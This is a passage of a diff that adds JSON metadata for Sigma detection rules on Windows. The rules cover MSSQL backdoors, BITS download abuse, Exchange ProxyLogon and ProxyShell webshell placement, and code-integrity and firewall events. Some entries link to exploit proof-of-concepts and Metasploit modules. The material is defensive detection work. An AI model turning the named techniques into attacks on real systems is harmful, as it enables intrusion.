Which should be a rare occurrence once it's set up" + ], + "filename": "win_mssql_disable_audit_settings.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "value": "MSSQL Disable Audit Settings" + }, + { + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "meta": { + "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "creation_date": "2022/10/09", + "falsepositive": [ + "Legitimate extended stored procedures named maggie" + ], + "filename": "win_mssql_sp_maggie.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "value": "MSSQL Extended Stored Procedure Backdoor Maggie" + }, + { + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "Legitimate use of the feature by administrators (rare)" + ], + "filename": "win_mssql_sp_procoption_set.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "value": "MSSQL SPProcoption Set" + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_mssql_xp_cmdshell_audit_log.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "7f103213-a04e-4d59-8261-213dddf22314", + "value": "MSSQL XPCmdshell Suspicious Execution" + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "meta": { + "author": "Nasreddine Bencherchali", + 
"creation_date": "2022/07/12", + "falsepositive": [ + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + ], + "filename": "win_mssql_xp_cmdshell_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", + "value": "MSSQL XPCmdshell Option Change" + }, + { + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/09/01", + "falsepositive": [ + "Legitimate Atera agent installation" + ], + "filename": "win_software_atera_rmm_agent_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" + ], + "tags": [ + "attack.t1219" + ] + }, + "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "value": "Atera Agent Installation" + }, + { + "description": "Detects backup catalog deletions", + "meta": { + "author": "Florian Roth (rule), Tom U. 
@c_APT_ure (collection)", + "creation_date": "2017/05/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_backup_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", + "value": "Backup Catalog Deleted" + }, + { + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/09", + "falsepositive": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "filename": "win_susp_msmpeng_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ] + }, + "uuid": "6c82cf5c-090d-4d57-9188-533577631108", + "value": "Microsoft Malware Protection Engine Crash" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_vul_cve_2020_0688.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", + "value": "CVE-2020-0688 Exploitation via Eventlog" + }, + { + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Other MSI packages for which your admins have used that name" + ], + "filename": "win_vul_cve_2021_41379.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" + }, + { + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. 
You need configure applocker and log collect to receive these events.", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/28", + "falsepositive": [ + "Need tuning applocker or add exceptions in SIEM" + ], + "filename": "win_applocker_file_was_not_allowed_to_run.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", + "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" + ] + }, + "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "value": "File Was Not Allowed To Run" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_bits_client_susp_domain.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", + "value": "Suspicious Download with BITS from Suspicious TLD" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_file.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": 
"b85e5894-9b19-4d86-8c87-a2f3b81f0521", + "value": "Suspicious Download File Extension with BITS" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_folder.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "value": "Download with BITS to Suspicious Folder" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_powershell_job.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", + "value": "Suspicious Task Added by Powershell" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_use_bitsadmin.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "value": "Suspicious Task Added by Bitsadmin" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other legitimate domains used by software updaters" + ], + "filename": "win_bits_client_uncommon_domain.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", + "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" + }, + { + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/20", + "falsepositive": [ + "Antivirus products" + ], + "filename": "win_codeintegrity_attempted_dll_load.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1483810148602814466", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "value": "Code Integrity Attempted DLL Load" + }, + { + "description": "Detects blocked load attempts of revoked drivers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_codeintegrity_revoked_driver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "value": "Block Load Of Revoked Driver" + }, + { + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_codeintergiry_blocked_driver_load.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "value": "Code Integrity Blocked Driver Load" + }, + { + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate package hosted on a known and authorized remote location" + ], + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1539679555908141061", + "https://twitter.com/j00sean/status/1537750439701225472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "value": "Loading Diagcab Package From Remote Path" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_apt_gallium.yml", + "level": "high", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "value": "GALLIUM Artefacts - Builtin" + }, + { + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_dns_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", + "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" + }, + { + "description": "Detects plugged USB devices", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/09", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_usb_device_plugged.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + 
"https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1200" + ] + }, + "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "value": "USB Device Plugged" + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_add_rule.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "value": "Added Rule in Windows Firewall with Advanced Security" + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_change_rule.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", + "value": "Modified Rule in Windows Firewall with Advanced Security" + }, + { + "description": "A rule has been deleted in the Windows Firewall 
exception list.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_delete_rule.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "value": "Delete Rule in Windows Firewall with Advanced Security" + }, + { + "description": "The Windows Firewall service failed to load Group Policy.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_failed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml" + ], + "tags": "No established tags" + }, + "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", + "value": "Failed to Load Policy in Windows Firewall with Advanced Security" + }, + { + "description": "Windows Firewall has been reset to its default configuration.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_reset.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml" + ], + "tags": "No established tags" + }, + "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", + "value": "Reset to Default Configuration Windows Firewall with Advanced Security" + }, + { + "description": "Setting have been change in Windows Firewall", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_setting_change.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" + ], + "tags": "No established tags" + }, + "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "value": "Setting Change in Windows Firewall with Advanced Security" + }, + { + "description": "Detects possible Active Directory enumeration via LDAP", + "meta": { + "author": "Adeem Mawani", + "creation_date": "2021/06/22", + "falsepositive": "No established falsepositives", + "filename": "win_ldap_recon.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + 
] + }, + "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", + "value": "LDAP Reconnaissance / Active Directory Enumeration" + }, + { + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "meta": { + "author": "Florian Roth, @testanull", + "creation_date": "2021/11/18", + "falsepositive": [ + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + ], + "filename": "win_exchange_cve_2021_42321.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210" + ] + }, + "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "value": "Possible Exploitation of Exchange RCE CVE-2021-42321" + }, + { + "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_exchange_proxylogon_oabvirtualdir.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", + "value": "ProxyLogon MSExchange OabVirtualDirectory" + }, + { + "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix 
which can be used to place a webshell", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_exchange_proxyshell_certificate_generation.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/GossiTheDog/status/1429175908905127938", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", + "value": "Certificate Request Export to Exchange Webserver" + }, + { + "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", + "meta": { + "author": "Florian Roth, Rich Warren, Christian Burkard", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_exchange_proxyshell_mailbox_export.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", + "value": "Mailbox Export to Exchange Webserver" + }, + { + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", + "level": "high", + "logsource.category": "No 
established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "value": "Remove Exported Mailbox from Exchange Webserver" + }, + { + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "meta": { + "author": "Jose Rodriguez @Cyb3rPandaH", + "creation_date": "2021/03/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 